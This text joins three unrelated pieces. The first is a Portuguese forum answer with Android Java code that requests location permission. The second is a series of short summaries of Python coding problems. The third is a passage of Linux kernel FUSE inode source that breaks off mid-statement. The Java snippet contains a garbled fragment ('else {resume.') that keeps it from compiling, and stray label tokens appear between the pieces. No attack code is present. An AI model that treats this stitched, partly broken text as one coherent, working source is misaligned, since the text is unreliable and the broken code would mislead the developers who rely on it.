introduziu um novo modelo de processamento de permissões que otimiza o processo para usuários quando instalam e atualizam aplicativos. Se o aplicativo é direcionado ao nível da API 23 ou mais recente, você pode usar o novo modelo de permissões. crie a classe PermitirLocalização **A classe mostrará o dialogo e informações necessárias que o úsuario precisa saber. public class PermitirLocalizacao { public static void requestPermission(MapsActivity activity, int requestId, String permission, boolean finishActivity) { if (ActivityCompat.shouldShowRequestPermissionRationale(activity, permission)) { PermitirLocalizacao.RationaleDialog.newInstance(requestId, finishActivity) .show(activity.getSupportFragmentManager(), "dialog"); } else { ActivityCompat.requestPermissions(activity, new String[]{permission}, requestId); } } public static boolean isPermissionGranted(String[] grantPermissions, int[] grantResults, String permission) { for (int i = 0; i < grantPermissions.length; i++) { if (permission.equals(grantPermissions[i])) { return grantResults[i] == PackageManager.PERMISSION_GRANTED; } } return false; } public static class PermissionDeniedDialog extends DialogFragment { private static final String ARGUMENT_FINISH_ACTIVITY = "finish"; private boolean mFinishActivity = false; public static PermissionDeniedDialog newInstance(boolean finishActivity) { Bundle arguments = new Bundle(); arguments.putBoolean(ARGUMENT_FINISH_ACTIVITY, finishActivity); PermissionDeniedDialog dialog = new PermissionDeniedDialog(); dialog.setArguments(arguments); return dialog; } @Override public Dialog onCreateDialog(Bundle savedInstanceState) { mFinishActivity = getArguments().getBoolean(ARGUMENT_FINISH_ACTIVITY); return new AlertDialog.Builder(getActivity()) .setMessage("Este exemplo requere uma permissão para acessar \\'a minha localização\\' layer. Please try again and grant access to use the location.\\nIf the permission has been permanently denied, it can be enabled from the System Settings &gt; Apps &gt; \\'Google Maps API Demos\\'") .setPositiveButton(android.R.string.ok, null) .create(); } @Override public void onDismiss(DialogInterface dialog) { super.onDismiss(dialog); if (mFinishActivity) { Toast.makeText(getActivity(), "A permissão é necessária para continuar.", Toast.LENGTH_SHORT).show(); getActivity().finish(); } } } public static class RationaleDialog extends DialogFragment { private static final String ARGUMENT_PERMISSION_REQUEST_CODE = "requestCode"; private static final String ARGUMENT_FINISH_ACTIVITY = "finish"; private boolean mFinishActivity = false; public static RationaleDialog newInstance(int requestCode, boolean finishActivity) { Bundle arguments = new Bundle(); arguments.putInt(ARGUMENT_PERMISSION_REQUEST_CODE, requestCode); arguments.putBoolean(ARGUMENT_FINISH_ACTIVITY, finishActivity); RationaleDialog dialog = new RationaleDialog(); dialog.setArguments(arguments); return dialog; } @Override public Dialog onCreateDialog(Bundle savedInstanceState) { Bundle arguments = getArguments(); final int requestCode = arguments.getInt(ARGUMENT_PERMISSION_REQUEST_CODE); mFinishActivity = arguments.getBoolean(ARGUMENT_FINISH_ACTIVITY); return new AlertDialog.Builder(getActivity()) .setMessage("O acesso ao serviço de localização é necessário para demonstrar a funcionalidade.") .setPositiveButton(android.R.string.ok, new DialogInterface.OnClickListener() { @Override public void onClick(DialogInterface dialog, int which) { ActivityCompat.requestPermissions(getActivity(), new String[]{Manifest.permission.ACCESS_FINE_LOCATION}, requestCode); mFinishActivity = false; } }) .setNegativeButton(android.R.string.cancel, null) .create(); } @Override public void onDismiss(DialogInterface dialog) { super.onDismiss(dialog); if (mFinishActivity) { Toast.makeText(getActivity(), "permissão Localização é necessário para esta demonstração", Toast.LENGTH_SHORT) .show(); getActivity().finish(); } } } } Na sua activity do mapa: public class MapsActivity extends FragmentActivity implements GoogleMap.OnMyLocationButtonClickListener, OnMapReadyCallback, ActivityCompat.OnRequestPermissionsResultCallback { private GoogleMap mMap; private static final int LOCATION_PERMISSION_REQUEST_CODE = 1; private boolean mPermissionDenied = false; @Override protected void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_maps); SupportMapFragment mapFragment = (SupportMapFragment) getSupportFragmentManager() .findFragmentById(R.id.map); mapFragment.getMapAsync(this); } @Override public void onMapReady(GoogleMap googleMap) { mMap = googleMap; enableMyLocation(); } private void enableMyLocation() { if (ContextCompat.checkSelfPermission(this, Manifest.permission.ACCESS_FINE_LOCATION) != PackageManager.PERMISSION_GRANTED) { PermitirLocalizacao.requestPermission(this, LOCATION_PERMISSION_REQUEST_CODE, Manifest.permission.ACCESS_FINE_LOCATION, true); } else if (mMap != null) { mMap.setMyLocationEnabled(true); } } @Override public void onRequestPermissionsResult(int requestCode, @NonNull String[] permissions, @NonNull int[] grantResults) { if (requestCode != LOCATION_PERMISSION_REQUEST_CODE) { return; } if (PermitirLocalizacao.isPermissionGranted(permissions, grantResults, Manifest.permission.ACCESS_FINE_LOCATION)) { enableMyLocation(); } else {resume. mPermissionDenied = true; } } @Override protected void onResumeFragments() { super.onResumeFragments(); if (mPermissionDenied) { showMissingPermissionError(); mPermissionDenied = false; } } private void showMissingPermissionError() { PermitirLocalizacao.PermissionDeniedDialog .newInstance(true).show(getSupportFragmentManager(), "dialog"); } Esse código resolveu o meu problema, espero que resolva o seu também, forte abraço. Fonte: Google Android developers • muito obrigado maico resposta perfeita – Roger Casagrande 23/08/16 às 5:05 Esta não é a resposta que você está procurando? Pesquise outras perguntas com a tag ou faça sua própria pergunta.
__label__pos
0.991837
Minimum Absolute Difference in Python Given an array of distinct integers arr, find all pairs of elements with the minimum absolute difference of any two elements.  Return a list of pairs in ascending order(with respect to pairs), each pair [a, b] follows a, b are from arr a < b b – a equals to the minimum absolute difference of any two elements in arr Example 1: Input: arr = [4,2,1,3] … Read more Minimum Absolute Difference in Python Minimum Time Visiting All Points in Python On a plane, there are n points with integer coordinates points[i] = [xi, yi]. Your task is to find the minimum time in seconds to visit all points. You can move according to the next rules: In one second always you can either move vertically, horizontally by one unit or diagonally (it means to move one unit vertically … Read more Minimum Time Visiting All Points in Python Search Suggestions System in Python Given an array of strings products and a string searchWord. We want to design a system that suggests at most three product names from products after each character of searchWord is typed. Suggested products should have common prefix with the searchWord. If there are more than three products with a common prefix return the three lexicographically minimums products. Return list of lists of the suggested products after each … Read more Search Suggestions System in Python Find Winner on a Tic Tac Toe Game in Python Tic-tac-toe is played by two players A and B on a 3 x 3 grid. Here are the rules of Tic-Tac-Toe: Players take turns placing characters into empty squares (” “). The first player A always places “X” characters, while the second player B always places “O” characters. “X” and “O” characters are always placed into empty squares, never on filled ones. The game ends when there are 3 … Read more Find Winner on a Tic Tac Toe Game in Python Number of Burgers with No Waste of Ingredients in Python Given two integers tomatoSlices and cheeseSlices. The ingredients of different burgers are as follows: Jumbo Burger: 4 tomato slices and 1 cheese slice. Small Burger: 2 Tomato slices and 1 cheese slice. Return [total_jumbo, total_small] so that the number of remaining tomatoSlices equal to 0 and the number of remaining cheeseSlices equal to 0. If it is not possible … Read more Number of Burgers with No Waste of Ingredients in Python Group the People Given the Group Size They Belong To in Python Problem:  There are n people whose IDs go from 0 to n – 1 and each person belongs exactly to one group. Given the array groupSizes of length n telling the group size each person belongs to, return the groups there are and the people’s IDs each group includes. You can return any solution in any order and … Read more Group the People Given the Group Size They Belong To in Python Find the Smallest Divisor Given a Threshold in Python Problem:  Given an array of integers nums and an integer threshold, we will choose a positive integer divisor and divide all the array by it and sum the result of the division. Find the smallest divisor such that the result mentioned above is less than or equal to threshold. Each result of division is rounded to the nearest integer greater than … Read more Find the Smallest Divisor Given a Threshold in Python
__label__pos
0.933977
blob: 1ce67668a8e17d2d721c456ed02865e01c01f7a2 [file] [log] [blame] /* FUSE: Filesystem in Userspace Copyright (C) 2001-2008 Miklos Szeredi <[email protected]> This program can be distributed under the terms of the GNU GPL. See the file COPYING. */ #include "fuse_i.h" #include <linux/pagemap.h> #include <linux/slab.h> #include <linux/file.h> #include <linux/seq_file.h> #include <linux/init.h> #include <linux/module.h> #include <linux/moduleparam.h> #include <linux/parser.h> #include <linux/statfs.h> #include <linux/random.h> #include <linux/sched.h> #include <linux/exportfs.h> MODULE_AUTHOR("Miklos Szeredi <[email protected]>"); MODULE_DESCRIPTION("Filesystem in Userspace"); MODULE_LICENSE("GPL"); static struct kmem_cache *fuse_inode_cachep; struct list_head fuse_conn_list; DEFINE_MUTEX(fuse_mutex); static int set_global_limit(const char *val, struct kernel_param *kp); unsigned max_user_bgreq; module_param_call(max_user_bgreq, set_global_limit, param_get_uint, &max_user_bgreq, 0644); __MODULE_PARM_TYPE(max_user_bgreq, "uint"); MODULE_PARM_DESC(max_user_bgreq, "Global limit for the maximum number of backgrounded requests an " "unprivileged user can set"); unsigned max_user_congthresh; module_param_call(max_user_congthresh, set_global_limit, param_get_uint, &max_user_congthresh, 0644); __MODULE_PARM_TYPE(max_user_congthresh, "uint"); MODULE_PARM_DESC(max_user_congthresh, "Global limit for the maximum congestion threshold an " "unprivileged user can set"); #define FUSE_SUPER_MAGIC 0x65735546 #define FUSE_DEFAULT_BLKSIZE 512 /** Maximum number of outstanding background requests */ #define FUSE_DEFAULT_MAX_BACKGROUND 12 /** Congestion starts at 75% of maximum */ #define FUSE_DEFAULT_CONGESTION_THRESHOLD (FUSE_DEFAULT_MAX_BACKGROUND * 3 / 4) struct fuse_mount_data { int fd; unsigned rootmode; kuid_t user_id; kgid_t group_id; unsigned fd_present:1; unsigned rootmode_present:1; unsigned user_id_present:1; unsigned group_id_present:1; unsigned flags; unsigned max_read; unsigned blksize; }; struct fuse_forget_link *fuse_alloc_forget(void) { return kzalloc(sizeof(struct fuse_forget_link), GFP_KERNEL); } static struct inode *fuse_alloc_inode(struct super_block *sb) { struct inode *inode; struct fuse_inode *fi; inode = kmem_cache_alloc(fuse_inode_cachep, GFP_KERNEL); if (!inode) return NULL; fi = get_fuse_inode(inode); fi->i_time = 0; fi->nodeid = 0; fi->nlookup = 0; fi->attr_version = 0; fi->writectr = 0; fi->orig_ino = 0; fi->state = 0; INIT_LIST_HEAD(&fi->write_files); INIT_LIST_HEAD(&fi->queued_writes); INIT_LIST_HEAD(&fi->writepages); init_waitqueue_head(&fi->page_waitq); fi->forget = fuse_alloc_forget(); if (!fi->forget) { kmem_cache_free(fuse_inode_cachep, inode); return NULL; } return inode; } static void fuse_i_callback(struct rcu_head *head) { struct inode *inode = container_of(head, struct inode, i_rcu); kmem_cache_free(fuse_inode_cachep, inode); } static void fuse_destroy_inode(struct inode *inode) { struct fuse_inode *fi = get_fuse_inode(inode); BUG_ON(!list_empty(&fi->write_files)); BUG_ON(!list_empty(&fi->queued_writes)); kfree(fi->forget); call_rcu(&inode->i_rcu, fuse_i_callback); } static void fuse_evict_inode(struct inode *inode) { truncate_inode_pages_final(&inode->i_data); clear_inode(inode); if (inode->i_sb->s_flags & MS_ACTIVE) { struct fuse_conn *fc = get_fuse_conn(inode); struct fuse_inode *fi = get_fuse_inode(inode); fuse_queue_forget(fc, fi->forget, fi->nodeid, fi->nlookup); fi->forget = NULL; } } static int fuse_remount_fs(struct super_block *sb, int *flags, char *data) { sync_filesystem(sb); if (*flags & MS_MANDLOCK) return -EINVAL; return 0; } /* * ino_t is 32-bits on 32-bit arch. We have to squash the 64-bit value down * so that it will fit. */ static ino_t fuse_squash_ino(u64 ino64) { ino_t ino = (ino_t) ino64; if (sizeof(ino_t) < sizeof(u64)) ino ^= ino64 >> (sizeof(u64) - sizeof(ino_t)) * 8; return ino; } void fuse_change_attributes_common(struct inode *inode, struct fuse_attr *attr, u64 attr_valid) { struct fuse_conn *fc = get_fuse_conn(inode); struct fuse_inode *fi = get_fuse_inode(inode); fi->attr_version = ++fc->attr_version; fi->i_time = attr_valid; inode->i_ino = fuse_squash_ino(attr->ino); inode->i_mode = (inode->i_mode & S_IFMT) | (attr->mode & 07777); set_nlink(inode, attr->nlink); inode->i_uid = make_kuid(&init_user_ns, attr->uid); inode->i_gid = make_kgid(&init_user_ns, attr->gid); inode->i_blocks = attr->blocks; inode->i_atime.tv_sec = attr->atime; inode->i_atime.tv_nsec = attr->atimensec; /* mtime from server may be stale due to local buffered write */ if (!fc->writeback_cache || !S_ISREG(inode->i_mode)) { inode->i_mtime.tv_sec = attr->mtime; inode->i_mtime.tv_nsec = attr->mtimensec; inode->i_ctime.tv_sec = attr->ctime; inode->i_ctime.tv_nsec = attr->ctimensec; } if (attr->blksize != 0) inode->i_blkbits = ilog2(attr->blksize); else inode->i_blkbits = inode->i_sb->s_blocksize_bits; /* * Don't set the sticky bit in i_mode, unless we want the VFS * to check permissions. This prevents failures due to the * check in may_delete(). */ fi->orig_i_mode = inode->i_mode; if (!(fc->flags & FUSE_DEFAULT_PERMISSIONS)) inode->i_mode &= ~S_ISVTX; fi->orig_ino = attr->ino; } void fuse_change_attributes(struct inode *inode, struct fuse_attr *attr, u64 attr_valid, u64 attr_version) { struct fuse_conn *fc = get_fuse_conn(inode); struct fuse_inode *fi = get_fuse_inode(inode); bool is_wb = fc->writeback_cache; loff_t oldsize; struct timespec old_mtime; spin_lock(&fc->lock); if ((attr_version != 0 && fi->attr_version > attr_version) || test_bit(FUSE_I_SIZE_UNSTABLE, &fi->state)) { spin_unlock(&fc->lock); return; } old_mtime = inode->i_mtime; fuse_change_attributes_common(inode, attr, attr_valid); oldsize = inode->i_size; /* * In case of writeback_cache enabled, the cached writes beyond EOF * extend local i_size without keeping userspace server in sync. So, * attr->size coming from server can be stale. We cannot trust it. */ if (!is_wb || !S_ISREG(inode->i_mode)) i_size_write(inode, attr->size); spin_unlock(&fc->lock); if (!is_wb && S_ISREG(inode->i_mode)) { bool inval = false; if (oldsize != attr->size) { truncate_pagecache(inode, attr->size); inval = true; } else if (fc->auto_inval_data) { struct timespec new_mtime = { .tv_sec = attr->mtime, .tv_nsec = attr->mtimensec, }; /* * Auto inval mode also checks and invalidates if mtime * has changed. */ if (!timespec_equal(&old_mtime, &new_mtime)) inval = true; } if (inval) invalidate_inode_pages2(inode->i_mapping); } } static void fuse_init_inode(struct inode *inode, struct fuse_attr *attr) { inode->i_mode = attr->mode & S_IFMT; inode->i_size = attr->size; inode->i_mtime.tv_sec = attr->mtime; inode->i_mtime.tv_nsec = attr->mtimensec; inode->i_ctime.tv_sec = attr->ctime; inode->i_ctime.tv_nsec = attr->ctimensec; if (S_ISREG(inode->i_mode)) { fuse_init_common(inode); fuse_init_file_inode(inode); } else if (S_ISDIR(inode->i_mode)) fuse_init_dir(inode); else if (S_ISLNK(inode->i_mode)) fuse_init_symlink(inode); else if (S_ISCHR(inode->i_mode) || S_ISBLK(inode->i_mode) || S_ISFIFO(inode->i_mode) || S_ISSOCK(inode->i_mode)) { fuse_init_common(inode); init_special_inode(inode, inode->i_mode, new_decode_dev(attr->rdev)); } else BUG(); } int fuse_inode_eq(struct inode *inode, void *_nodeidp) { u64 nodeid = *(u64 *) _nodeidp; if (get_node_id(inode) == nodeid) return 1; else return 0; } static int fuse_inode_set(struct inode *inode, void *_nodeidp) { u64 nodeid = *(u64 *) _nodeidp; get_fuse_inode(inode)->nodeid = nodeid; return 0; } struct inode *fuse_iget(struct super_block *sb, u64 nodeid, int generation, struct fuse_attr *attr, u64 attr_valid, u64 attr_version) { struct inode *inode; struct fuse_inode *fi; struct fuse_conn *fc = get_fuse_conn_super(sb); retry: inode = iget5_locked(sb, nodeid, fuse_inode_eq, fuse_inode_set, &nodeid); if (!inode) return NULL; if ((inode->i_state & I_NEW)) { inode->i_flags |= S_NOATIME; if (!fc->writeback_cache || !S_ISREG(attr->mode)) inode->i_flags |= S_NOCMTIME; inode->i_generation = generation; fuse_init_inode(inode, attr); unlock_new_inode(inode); } else if ((inode->i_mode ^ attr->mode) & S_IFMT) { /* Inode has changed type, any I/O on the old should fail */ make_bad_inode(inode); iput(inode); goto retry; } fi = get_fuse_inode(inode); spin_lock(&fc->lock); fi->nlookup++; spin_unlock(&fc->lock); fuse_change_attributes(inode, attr, attr_valid, attr_version); return inode; } int fuse_reverse_inval_inode(struct super_block *sb, u64 nodeid, loff_t offset, loff_t len) { struct inode *inode; pgoff_t pg_start; pgoff_t pg_end; inode = ilookup5(sb, nodeid, fuse_inode_eq, &nodeid); if (!inode) return -ENOENT; fuse_invalidate_attr(inode); if (offset >= 0) { pg_start = offset >> PAGE_SHIFT; if (len <= 0) pg_end = -1; else pg_end = (offset + len - 1) >> PAGE_SHIFT; invalidate_inode_pages2_range(inode->i_mapping, pg_start, pg_end); } iput(inode); return 0; } static void fuse_umount_begin(struct super_block *sb) { fuse_abort_conn(get_fuse_conn_super(sb)); } static void fuse_send_destroy(struct fuse_conn *fc) { struct fuse_req *req = fc->destroy_req; if (req && fc->conn_init) { fc->destroy_req = NULL; req->in.h.opcode = FUSE_DESTROY; __set_bit(FR_FORCE, &req->flags); __clear_bit(FR_BACKGROUND, &req->flags); fuse_request_send(fc, req); fuse_put_request(fc, req); } } static void fuse_bdi_destroy(struct fuse_conn *fc) { if (fc->bdi_initialized) bdi_destroy(&fc->bdi); } static void fuse_put_super(struct super_block *sb) { struct fuse_conn *fc = get_fuse_conn_super(sb); fuse_send_destroy(fc); fuse_abort_conn(fc); mutex_lock(&fuse_mutex); list_del(&fc->entry); fuse_ctl_remove_conn(fc); mutex_unlock(&fuse_mutex); fuse_bdi_destroy(fc); fuse_conn_put(fc); } static void convert_fuse_statfs(struct kstatfs *stbuf, struct fuse_kstatfs *attr) { stbuf->f_type = FUSE_SUPER_MAGIC; stbuf->f_bsize = attr->bsize; stbuf->f_frsize = attr->frsize; stbuf->f_blocks = attr->blocks; stbuf->f_bfree = attr->bfree; stbuf->f_bavail = attr->bavail; stbuf->f_files = attr->files; stbuf->f_ffree = attr->ffree; stbuf->f_namelen = attr->namelen; /* fsid is left zero */ } static int fuse_statfs(struct dentry *dentry, struct kstatfs *buf) { struct super_block *sb = dentry->d_sb; struct fuse_conn *fc = get_fuse_conn_super(sb); FUSE_ARGS(args); struct fuse_statfs_out outarg; int err; if (!fuse_allow_current_process(fc)) { buf->f_type = FUSE_SUPER_MAGIC; return 0; } memset(&outarg, 0, sizeof(outarg)); args.in.numargs = 0; args.in.h.opcode = FUSE_STATFS; args.in.h.nodeid = get_node_id(d_inode(dentry)); args.out.numargs = 1; args.out.args[0].size = sizeof(outarg); args.out.args[0].value = &outarg; err = fuse_simple_request(fc, &args); if (!err) convert_fuse_statfs(buf, &outarg.st); return err; } enum { OPT_FD, OPT_ROOTMODE, OPT_USER_ID, OPT_GROUP_ID, OPT_DEFAULT_PERMISSIONS, OPT_ALLOW_OTHER, OPT_MAX_READ, OPT_BLKSIZE, OPT_ERR }; static const match_table_t tokens = { {OPT_FD, "fd=%u"}, {OPT_ROOTMODE, "rootmode=%o"}, {OPT_USER_ID, "user_id=%u"}, {OPT_GROUP_ID, "group_id=%u"}, {OPT_DEFAULT_PERMISSIONS, "default_permissions"}, {OPT_ALLOW_OTHER, "allow_other"}, {OPT_MAX_READ, "max_read=%u"}, {OPT_BLKSIZE, "blksize=%u"}, {OPT_ERR, NULL} }; static int fuse_match_uint(substring_t *s, unsigned int *res) { int err = -ENOMEM; char *buf = match_strdup(s); if (buf) { err = kstrtouint(buf, 10, res); kfree(buf); } return err; } static int parse_fuse_opt(char *opt, struct fuse_mount_data *d, int is_bdev) { char *p; memset(d, 0, sizeof(struct fuse_mount_data)); d->max_read = ~0; d->blksize = FUSE_DEFAULT_BLKSIZE; while ((p = strsep(&opt, ",")) != NULL) { int token; int value; unsigned uv; substring_t args[MAX_OPT_ARGS]; if (!*p) continue; token = match_token(p, tokens, args); switch (token) { case OPT_FD: if (match_int(&args[0], &value)) return 0; d->fd = value; d->fd_present = 1; break; case OPT_ROOTMODE: if (match_octal(&args[0], &value)) return 0; if (!fuse_valid_type(value)) return 0; d->rootmode = value; d->rootmode_present = 1; break; case OPT_USER_ID: if (fuse_match_uint(&args[0], &uv)) return 0; d->user_id = make_kuid(current_user_ns(), uv); if (!uid_valid(d->user_id)) return 0; d->user_id_present = 1; break; case OPT_GROUP_ID: if (fuse_match_uint(&args[0], &uv)) return 0; d->group_id = make_kgid(current_user_ns(), uv); if (!gid_valid(d->group_id)) return 0; d->group_id_present = 1; break; case OPT_DEFAULT_PERMISSIONS: d->flags |= FUSE_DEFAULT_PERMISSIONS; break; case OPT_ALLOW_OTHER: d->flags |= FUSE_ALLOW_OTHER; break; case OPT_MAX_READ: if (match_int(&args[0], &value)) return 0; d->max_read = value; break; case OPT_BLKSIZE: if (!is_bdev || match_int(&args[0], &value)) return 0; d->blksize = value; break; default: return 0; } } if (!d->fd_present || !d->rootmode_present || !d->user_id_present || !d->group_id_present) return 0; return 1; } static int fuse_show_options(struct seq_file *m, struct dentry *root) { struct super_block *sb = root->d_sb; struct fuse_conn *fc = get_fuse_conn_super(sb); seq_printf(m, ",user_id=%u", from_kuid_munged(&init_user_ns, fc->user_id)); seq_printf(m, ",group_id=%u", from_kgid_munged(&init_user_ns, fc->group_id)); if (fc->flags & FUSE_DEFAULT_PERMISSIONS) seq_puts(m, ",default_permissions"); if (fc->flags & FUSE_ALLOW_OTHER) seq_puts(m, ",allow_other"); if (fc->max_read != ~0) seq_printf(m, ",max_read=%u", fc->max_read); if (sb->s_bdev && sb->s_blocksize != FUSE_DEFAULT_BLKSIZE) seq_printf(m, ",blksize=%lu", sb->s_blocksize); return 0; } static void fuse_iqueue_init(struct fuse_iqueue *fiq) { memset(fiq, 0, sizeof(struct fuse_iqueue)); init_waitqueue_head(&fiq->waitq); INIT_LIST_HEAD(&fiq->pending); INIT_LIST_HEAD(&fiq->interrupts); fiq->forget_list_tail = &fiq->forget_list_head; fiq->connected = 1; } static void fuse_pqueue_init(struct fuse_pqueue *fpq) { memset(fpq, 0, sizeof(struct fuse_pqueue)); spin_lock_init(&fpq->lock); INIT_LIST_HEAD(&fpq->processing); INIT_LIST_HEAD(&fpq->io); fpq->connected = 1; } void fuse_conn_init(struct fuse_conn *fc) { memset(fc, 0, sizeof(*fc)); spin_lock_init(&fc->lock); init_rwsem(&fc->killsb); atomic_set(&fc->count, 1); atomic_set(&fc->dev_count, 1); init_waitqueue_head(&fc->blocked_waitq); init_waitqueue_head(&fc->reserved_req_waitq); fuse_iqueue_init(&fc->iq); INIT_LIST_HEAD(&fc->bg_queue); INIT_LIST_HEAD(&fc->entry); INIT_LIST_HEAD(&fc->devices); atomic_set(&fc->num_waiting, 0); fc->max_background = FUSE_DEFAULT_MAX_BACKGROUND; fc->congestion_threshold = FUSE_DEFAULT_CONGESTION_THRESHOLD; fc->khctr = 0; fc->polled_files = RB_ROOT; fc->blocked = 0; fc->initialized = 0; fc->connected = 1; fc->attr_version = 1; get_random_bytes(&fc->scramble_key, sizeof(fc->scramble_key)); } EXPORT_SYMBOL_GPL(fuse_conn_init); void fuse_conn_put(struct fuse_conn *fc) { if (atomic_dec_and_test(&fc->count)) { if (fc->destroy_req) fuse_request_free(fc->destroy_req); fc->release(fc); } } EXPORT_SYMBOL_GPL(fuse_conn_put); struct fuse_conn *fuse_conn_get(struct fuse_conn *fc) { atomic_inc(&fc->count); return fc; } EXPORT_SYMBOL_GPL(fuse_conn_get); static struct inode *fuse_get_root_inode(struct super_block *sb, unsigned mode) { struct fuse_attr attr; memset(&attr, 0, sizeof(attr)); attr.mode = mode; attr.ino = FUSE_ROOT_ID; attr.nlink = 1; return fuse_iget(sb, 1, 0, &attr, 0, 0); } struct fuse_inode_handle { u64 nodeid; u32 generation; }; static struct dentry *fuse_get_dentry(struct super_block *sb, struct fuse_inode_handle *handle) { struct fuse_conn *fc = get_fuse_conn_super(sb); struct inode *inode; struct dentry *entry; int err = -ESTALE; if (handle->nodeid == 0) goto out_err; inode = ilookup5(sb, handle->nodeid, fuse_inode_eq, &handle->nodeid); if (!inode) { struct fuse_entry_out outarg; struct qstr name; if (!fc->export_support) goto out_err; name.len = 1; name.name = "."; err = fuse_lookup_name(sb, handle->nodeid, &name, &outarg, &inode); if (err && err != -ENOENT) goto out_err; if (err || !inode) { err = -ESTALE; goto out_err; } err = -EIO; if (get_node_id(inode) != handle->nodeid) goto out_iput; } err = -ESTALE; if (inode->i_generation != handle->generation) goto out_iput; entry = d_obtain_alias(inode); if (!IS_ERR(entry) && get_node_id(inode) != FUSE_ROOT_ID) fuse_invalidate_entry_cache(entry); return entry; out_iput: iput(inode); out_err: return ERR_PTR(err); } static int fuse_encode_fh(struct inode *inode, u32 *fh, int *max_len, struct inode *parent) { int len = parent ? 6 : 3; u64 nodeid; u32 generation; if (*max_len < len) { *max_len = len; return FILEID_INVALID; } nodeid = get_fuse_inode(inode)->nodeid; generation = inode->i_generation; fh[0] = (u32)(nodeid >> 32); fh[1] = (u32)(nodeid & 0xffffffff); fh[2] = generation; if (parent) { nodeid = get_fuse_inode(parent)->nodeid; generation = parent->i_generation; fh[3] = (u32)(nodeid >> 32); fh[4] = (u32)(nodeid & 0xffffffff); fh[5] = generation; } *max_len = len; return parent ? 0x82 : 0x81; } static struct dentry *fuse_fh_to_dentry(struct super_block *sb, struct fid *fid, int fh_len, int fh_type) { struct fuse_inode_handle handle; if ((fh_type != 0x81 && fh_type != 0x82) || fh_len < 3) return NULL; handle.nodeid = (u64) fid->raw[0] << 32; handle.nodeid |= (u64) fid->raw[1]; handle.generation = fid->raw[2]; return fuse_get_dentry(sb, &handle); } static struct dentry *fuse_fh_to_parent(struct super_block *sb, struct fid *fid, int fh_len, int fh_type) { struct fuse_inode_handle parent; if (fh_type != 0x82 || fh_len < 6) return NULL; parent.nodeid = (u64) fid->raw[3] << 32; parent.nodeid |= (u64) fid->raw[4]; parent.generation = fid->raw[5]; return fuse_get_dentry(sb, &parent); } static struct dentry *fuse_get_parent(struct dentry *child) { struct inode *child_inode = d_inode(child); struct fuse_conn *fc = get_fuse_conn(child_inode); struct inode *inode; struct dentry *parent; struct fuse_entry_out outarg; struct qstr name; int err; if (!fc->export_support) return ERR_PTR(-ESTALE); name.len = 2; name.name = ".."; err = fuse_lookup_name(child_inode->i_sb, get_node_id(child_inode), &name, &outarg, &inode); if (err) { if (err == -ENOENT) return ERR_PTR(-ESTALE); return ERR_PTR(err); } parent = d_obtain_alias(inode); if (!IS_ERR(parent) && get_node_id(inode) != FUSE_ROOT_ID) fuse_invalidate_entry_cache(parent); return parent; } static const struct export_operations fuse_export_operations = { .fh_to_dentry = fuse_fh_to_dentry, .fh_to_parent = fuse_fh_to_parent, .encode_fh = fuse_encode_fh, .get_parent = fuse_get_parent, }; static const struct super_operations fuse_super_operations = { .alloc_inode = fuse_alloc_inode, .destroy_inode = fuse_destroy_inode, .evict_inode = fuse_evict_inode, .write_inode = fuse_write_inode, .drop_inode = generic_delete_inode, .remount_fs = fuse_remount_fs, .put_super = fuse_put_super, .umount_begin = fuse_umount_begin, .statfs = fuse_statfs, .show_options = fuse_show_options, }; static void sanitize_global_limit(unsigned *limit) { if (*limit == 0) *limit = ((totalram_pages << PAGE_SHIFT) >> 13) / sizeof(struct fuse_req); if (*limit >= 1 << 16) *limit = (1 << 16) - 1; } static int set_global_limit(const char *val, struct kernel_param *kp) { int rv; rv = param_set_uint(val, kp); if (rv) return rv; sanitize_global_limit((unsigned *)kp->arg); return 0; } static void process_init_limits(struct fuse_conn *fc, struct fuse_init_out *arg) { int cap_sys_admin = capable(CAP_SYS_ADMIN); if (arg->minor < 13) return; sanitize_global_limit(&max_user_bgreq); sanitize_global_limit(&max_user_congthresh); if (arg->max_background) { fc->max_background = arg->max_background; if (!cap_sys_admin && fc->max_background > max_user_bgreq) fc->max_background = max_user_bgreq; } if (arg->congestion_threshold) { fc->congestion_threshold = arg->congestion_threshold; if (!cap_sys_admin && fc->congestion_threshold > max_user_congthresh) fc->congestion_threshold = max_user_congthresh; } } static void process_init_reply(struct fuse_conn *fc, struct fuse_req *req) { struct fuse_init_out *arg = &req->misc.init_out; if (req->out.h.error || arg->major != FUSE_KERNEL_VERSION) fc->conn_error = 1; else { unsigned long ra_pages; process_init_limits(fc, arg); if (arg->minor >= 6) { ra_pages = arg->max_readahead / PAGE_SIZE; if (arg->flags & FUSE_ASYNC_READ) fc->async_read = 1; if (!(arg->flags & FUSE_POSIX_LOCKS)) fc->no_lock = 1; if (arg->minor >= 17) { if (!(arg->flags & FUSE_FLOCK_LOCKS)) fc->no_flock = 1; } else { if (!(arg->flags & FUSE_POSIX_LOCKS)) fc->no_flock = 1; } if (arg->flags & FUSE_ATOMIC_O_TRUNC) fc->atomic_o_trunc = 1; if (arg->minor >= 9) { /* LOOKUP has dependency on proto version */ if (arg->flags & FUSE_EXPORT_SUPPORT) fc->export_support = 1; } if (arg->flags & FUSE_BIG_WRITES) fc->big_writes = 1; if (arg->flags & FUSE_DONT_MASK) fc->dont_mask = 1; if (arg->flags & FUSE_AUTO_INVAL_DATA) fc->auto_inval_data = 1; if (arg->flags & FUSE_DO_READDIRPLUS) { fc->do_readdirplus = 1; if (arg->flags & FUSE_READDIRPLUS_AUTO) fc->readdirplus_auto = 1; } if (arg->flags & FUSE_ASYNC_DIO) fc->async_dio = 1; if (arg->flags & FUSE_WRITEBACK_CACHE) fc->writeback_cache = 1; if (arg->time_gran && arg->time_gran <= 1000000000) fc->sb->s_time_gran = arg->time_gran; } else { ra_pages = fc->max_read / PAGE_SIZE; fc->no_lock = 1; fc->no_flock = 1; } fc->bdi.ra_pages = min(fc->bdi.ra_pages, ra_pages); fc->minor = arg->minor; fc->max_write = arg->minor < 5 ? 4096 : arg->max_write; fc->max_write = max_t(unsigned, 4096, fc->max_write); fc->conn_init = 1; } fuse_set_initialized(fc); wake_up_all(&fc->blocked_waitq); } static void fuse_send_init(struct fuse_conn *fc, struct fuse_req *req) { struct fuse_init_in *arg = &req->misc.init_in; arg->major = FUSE_KERNEL_VERSION; arg->minor = FUSE_KERNEL_MINOR_VERSION; arg->max_readahead = fc->bdi.ra_pages * PAGE_SIZE; arg->flags |= FUSE_ASYNC_READ | FUSE_POSIX_LOCKS | FUSE_ATOMIC_O_TRUNC | FUSE_EXPORT_SUPPORT | FUSE_BIG_WRITES | FUSE_DONT_MASK | FUSE_SPLICE_WRITE | 